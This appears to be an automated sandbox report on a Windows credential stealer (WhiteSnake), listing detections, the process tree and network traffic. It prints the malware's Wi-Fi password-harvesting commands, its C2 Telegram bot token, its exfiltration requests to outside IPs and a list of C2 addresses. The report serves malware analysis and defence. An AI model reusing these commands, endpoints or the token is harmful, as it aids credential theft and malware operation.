Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545189
MD5:d5b8ac0d80c99e7dda0d9df17c159f3d
SHA1:ae1e0aeb3fbba55999b74047ee2b8bb4e45f108a
SHA256:c330322b774eb263b008178ff707e13b843fd7df62445cca3c52356509c26f78
Tags:exeuser-Bitsight
Infos:

Detection

WhiteSnake Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D5B8AC0D80C99E7DDA0D9DF17C159F3D)
    • build.exe (PID: 6500 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: ECC94919C7D1385D489961B21AF97328)
      • cmd.exe (PID: 7200 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7304 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • netsh.exe (PID: 7320 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • findstr.exe (PID: 7332 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 7392 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • netsh.exe (PID: 7472 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • findstr.exe (PID: 7480 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 7028 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 6948 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • timeout.exe (PID: 6384 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\build.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security
      Process Memory Space: build.exe PID: 6500JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: build.exe PID: 6500JoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security
          Process Memory Space: build.exe PID: 6500JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.36bd1e8.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.2.file.exe.3685570.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\build.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\build.exe, ParentProcessId: 6500, ParentProcessName: build.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7200, ProcessName: cmd.exe
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\build.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\build.exe, ParentProcessId: 6500, ParentProcessName: build.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7200, ProcessName: cmd.exe
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 41.216.183.9, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\build.exe, Initiated: true, ProcessId: 6500, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49700

                Stealing of Sensitive Information

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\build.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\build.exe, ParentProcessId: 6500, ParentProcessName: build.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7200, ProcessName: cmd.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T08:11:05.347436+010020506021A Network Trojan was detected192.168.2.74970041.216.183.98080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T08:11:05.295031+010020506011A Network Trojan was detected192.168.2.74970041.216.183.98080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T08:12:44.915269+010020458681Successful Credential Theft Detected192.168.2.763169209.38.221.1848080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: build.exe.6500.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage"}
                Source: file.exeReversingLabs: Detection: 39%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Temp\build.exeJoe Sandbox ML: detected
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE7A21 CryptUnprotectData,2_2_00007FFAACCE7A21
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE7B6D CryptUnprotectData,2_2_00007FFAACCE7B6D
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:63170 version: TLS 1.2
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCF0C09h2_2_00007FFAACCF0607
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then dec eax2_2_00007FFAACCE6030
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCF1661h2_2_00007FFAACCEF356
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCF1E1Ah2_2_00007FFAACCF1BD8
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCF1661h2_2_00007FFAACCF0D8E
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then dec eax2_2_00007FFAACCF163D
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCF1661h2_2_00007FFAACCF00A5
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCE6C9Ch2_2_00007FFAACCE6A99
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCF2320h2_2_00007FFAACCF229C
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 00007FFAACCF1661h2_2_00007FFAACCF1279

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.7:49700 -> 41.216.183.9:8080
                Source: Network trafficSuricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.7:49700 -> 41.216.183.9:8080
                Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.7:63169 -> 209.38.221.184:8080
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 0.2.file.exe.36bd1e8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3685570.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
                Source: global trafficTCP traffic: 192.168.2.7:49700 -> 41.216.183.9:8080
                Source: global trafficTCP traffic: 192.168.2.7:63169 -> 209.38.221.184:8080
                Source: global trafficHTTP traffic detected: GET /bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 41.216.183.9:8080Content-Length: 123400Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ip-api.com
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.9
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 41.216.183.9:8080Content-Length: 123400Expect: 100-continueConnection: Keep-Alive
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.126.19.171:80
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.43.160.136:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
                Source: build.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.145.17.167:9090
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29:80
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.174.113:8090
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.235.70.96:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.211.88:8099
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.55.47:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/%79%4C%57%46%64%5F%66%72%6F%6E%74%64%65%73%6B%40%39%32%37%35%33%37%5F%72%
                Source: build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/get
                Source: build.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/yLWFd_user
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/yLWFd_user%40927537_report.wsr
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:80802
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.207.174.88:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.60.191.38:80
                Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.9:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.9:8080/sendData
                Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un
                Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.216.183.9:80802
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.87.207.180:9090
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.78.224:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.205.24:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.230.176.97:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.216.92.21:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.110.16:9999
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.143.111:8080
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
